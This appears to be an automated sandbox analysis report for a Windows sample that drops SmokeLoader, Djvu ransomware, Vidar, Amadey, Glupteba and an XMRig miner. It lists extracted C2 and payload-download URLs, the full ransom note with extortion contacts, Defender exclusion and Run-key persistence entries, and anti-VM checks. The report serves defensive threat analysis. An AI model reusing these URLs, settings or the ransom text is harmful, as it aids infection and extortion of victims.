amadey | 59a27d0654c9e71e0c02b512d45bd6ad7190f618d31349dd7617670ce6ad446d

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
02-03-2024 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
Size

259KB
MD5

117a962cde2568514649b76a004190f1
SHA1

e92ab6267e005eb78bac3c13b9de881b726bc7f2
SHA256

8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0
SHA512

a2eb2cd551bea8eead2cc7cf17dd91849395c475f329e9bd47ff4ebab8aff0c9a1e33921e4fc6af9ca762b6c80c48056b8991f8813b7e19a7eca4dfb0914041d
SSDEEP

3072:15QiI6J/iVo/QgheGRdWfPy0R9gSMGFwLh4+giekZXfSg55xGT+yx:1gVo/Qgp+lR9g+OhlRR9qwxGT

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

djvu

http://habrafa.com/test1/get.php

Attributes

extension
.wisz
offline_id
4p0Nzrg1q0ND5of5Gtp2UBjthSXuE8VxnMrd4vt1
payload_url
http://brusuax.com/dl/build2.exe
http://habrafa.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/ace9dcf133a3c07499672522e2c6bd3a20240301114053/77eeff Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshingmail.top Reserve e-mail address to contact us: datarestorehelpyou@airmail.cc Your personal ID: 0853ASdw

rsa_pubkey.plain

Extracted

Family

vidar

Version

Botnet

9b0f0dc6c2ca6ddeab1d498d4cdc7267

https://t.me/neoschats

https://steamcommunity.com/profiles/76561199644883218

Attributes

profile_id_v2
9b0f0dc6c2ca6ddeab1d498d4cdc7267
user_agent
Mozilla/5.0 (Linux; Android 11; M2102J20SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36 EdgA/97.0.1072.78

Extracted

Family

amadey

Version

4.17

http://185.215.113.32

Attributes

install_dir
00c07260dc
install_file
explorgu.exe
strings_key
461809bd97c251ba0c0c8450c7055f1d
url_paths
/yandex/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

DcRat 7 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe7427.exe

pid	process
352	schtasks.exe
1928	schtasks.exe
2256	schtasks.exe
1628	schtasks.exe
548	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c5abf4a2-0901-4389-b809-99ee19eae036\\7427.exe\" --AutoStart"	7427.exe

Detect Vidar Stealer 5 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1520-102-0x0000000000230000-0x0000000000264000-memory.dmp	family_vidar_v7
behavioral1/memory/1212-103-0x0000000000400000-0x0000000000647000-memory.dmp	family_vidar_v7
behavioral1/memory/1212-106-0x0000000000400000-0x0000000000647000-memory.dmp	family_vidar_v7
behavioral1/memory/1212-107-0x0000000000400000-0x0000000000647000-memory.dmp	family_vidar_v7
behavioral1/memory/1212-276-0x0000000000400000-0x0000000000647000-memory.dmp	family_vidar_v7

Detected Djvu ransomware 14 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2568-24-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2652-21-0x0000000003360000-0x000000000347B000-memory.dmp	family_djvu
behavioral1/memory/2568-27-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2568-28-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2568-51-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-61-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-62-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-77-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-78-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-95-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-87-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-96-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-108-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2984-156-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2088-389-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/2088-390-0x0000000003C80000-0x000000000456B000-memory.dmp	family_glupteba
behavioral1/memory/2088-402-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/1560-405-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/1560-415-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/2516-418-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/2516-543-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba
behavioral1/memory/2516-586-0x0000000000400000-0x0000000001E18000-memory.dmp	family_glupteba

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

C6DB.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C6DB.exe = "0"	C6DB.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

EFB.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ EFB.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	EFB.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2784	bcdedit.exe
1012	bcdedit.exe
1644	bcdedit.exe
2644	bcdedit.exe
1160	bcdedit.exe
2928	bcdedit.exe
2708	bcdedit.exe
1716	bcdedit.exe
2068	bcdedit.exe
1640	bcdedit.exe
1548	bcdedit.exe
1236	bcdedit.exe
1076	bcdedit.exe
2112	bcdedit.exe

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/972-3614-0x0000000000170000-0x0000000000C60000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

964 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
964	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EFB.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EFB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EFB.exe

Deletes itself 1 IoCs

Processes:

pid process

1216

pid	process
1216

Executes dropped EXE 34 IoCs

Processes:

7427.exe7427.exe7427.exe7427.exebuild2.exebuild2.exebuild3.exebuild3.exeB80A.exemstsca.exeC6DB.exemstsca.exeC6DB.execsrss.exeDE91.exepatch.exeinjector.exe6EF.exeEFB.exeCL_Debug_Log.txt1BE7.exedsefix.exewindefender.exewindefender.exemstsca.exeMicrosoftUP.exeMicrosoftUP.exeMicrosoftUP.exeMicrosoftUP.exemstsca.exetor.exeMicrosoftUP.exeinjector.exeinjector.exe

pid	process
2652	7427.exe
2568	7427.exe
304	7427.exe
2984	7427.exe
1520	build2.exe
1212	build2.exe
1856	build3.exe
2916	build3.exe
2592	B80A.exe
880	mstsca.exe
2088	C6DB.exe
1048	mstsca.exe
1560	C6DB.exe
2516	csrss.exe
888	DE91.exe
1288	patch.exe
2172	injector.exe
880	6EF.exe
560	EFB.exe
2972	CL_Debug_Log.txt
2668	1BE7.exe
2132	dsefix.exe
1364	windefender.exe
2632	windefender.exe
2652	mstsca.exe
1920	MicrosoftUP.exe
1284	MicrosoftUP.exe
2256	MicrosoftUP.exe
3000	MicrosoftUP.exe
2496	mstsca.exe
2836	tor.exe
704	MicrosoftUP.exe
1096	injector.exe
1652	injector.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

EFB.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine EFB.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine	EFB.exe

Loads dropped DLL 47 IoCs

Processes:

7427.exe7427.exe7427.exe7427.exeWerFault.exeWerFault.exeC6DB.exepatch.execsrss.exe6EF.exetaskeng.exeMicrosoftUP.exetor.exe

pid	process
2652	7427.exe
2568	7427.exe
2568	7427.exe
304	7427.exe
2984	7427.exe
2984	7427.exe
2984	7427.exe
2984	7427.exe
2764	WerFault.exe
2764	WerFault.exe
2764	WerFault.exe
2764	WerFault.exe
2764	WerFault.exe
2764	WerFault.exe
2764	WerFault.exe
2472	WerFault.exe
2472	WerFault.exe
2472	WerFault.exe
1560	C6DB.exe
1560	C6DB.exe
1216
868
1288	patch.exe
1288	patch.exe
1288	patch.exe
1288	patch.exe
1288	patch.exe
2516	csrss.exe
880	6EF.exe
1288	patch.exe
1288	patch.exe
1288	patch.exe
2516	csrss.exe
1532	taskeng.exe
1532	taskeng.exe
1300
2256	MicrosoftUP.exe
2256	MicrosoftUP.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
1328
2516	csrss.exe
2516	csrss.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3012 icacls.exe

pid	process
3012	icacls.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1364-651-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2632-653-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1364-654-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2632-703-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

C6DB.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	C6DB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C6DB.exe = "0"	C6DB.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

1BE7.execsrss.exe7427.exeC6DB.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HD Audio Background Process = "C:\\Windows\\scvhost.exe"	1BE7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c5abf4a2-0901-4389-b809-99ee19eae036\\7427.exe\" --AutoStart"	7427.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	C6DB.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 api.2ip.ua
19 api.2ip.ua
24 api.2ip.ua
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
18	api.2ip.ua
19	api.2ip.ua
24	api.2ip.ua

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\6EF.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\6EF.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

EFB.exe

pid process

560 EFB.exe

pid	process
560	EFB.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

7427.exe7427.exebuild2.exebuild3.exemstsca.exeMicrosoftUP.exemstsca.exe

description	pid	process	target process
PID 2652 set thread context of 2568	2652	7427.exe	7427.exe
PID 304 set thread context of 2984	304	7427.exe	7427.exe
PID 1520 set thread context of 1212	1520	build2.exe	build2.exe
PID 1856 set thread context of 2916	1856	build3.exe	build3.exe
PID 880 set thread context of 1048	880	mstsca.exe	mstsca.exe
PID 2256 set thread context of 3000	2256	MicrosoftUP.exe	MicrosoftUP.exe
PID 2652 set thread context of 2496	2652	mstsca.exe	mstsca.exe
PID 2256 set thread context of 704	2256	MicrosoftUP.exe	MicrosoftUP.exe
PID 2256 set thread context of 972	2256	MicrosoftUP.exe	attrib.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

C6DB.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN C6DB.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	C6DB.exe

Drops file in Windows directory 7 IoCs

Processes:

C6DB.exemakecab.exeEFB.exe1BE7.execsrss.exe

description	ioc	process
File opened for modification	C:\Windows\rss	C6DB.exe
File created	C:\Windows\rss\csrss.exe	C6DB.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240302010201.cab	makecab.exe
File created	C:\Windows\Tasks\explorgu.job	EFB.exe
File created	C:\Windows\scvhost.exe	1BE7.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1708 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2764 1212 WerFault.exe build2.exe
2472 2592 WerFault.exe B80A.exe

pid	process
1708	sc.exe

pid	pid_target	process	target process
2764	1212	WerFault.exe	build2.exe
2472	2592	WerFault.exe	B80A.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

352 schtasks.exe
1928 schtasks.exe
2256 schtasks.exe
1628 schtasks.exe
548 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2464 timeout.exe

pid	process
352	schtasks.exe
1928	schtasks.exe
2256	schtasks.exe
1628	schtasks.exe
548	schtasks.exe

pid	process
2464	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

C6DB.exewindefender.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	C6DB.exe
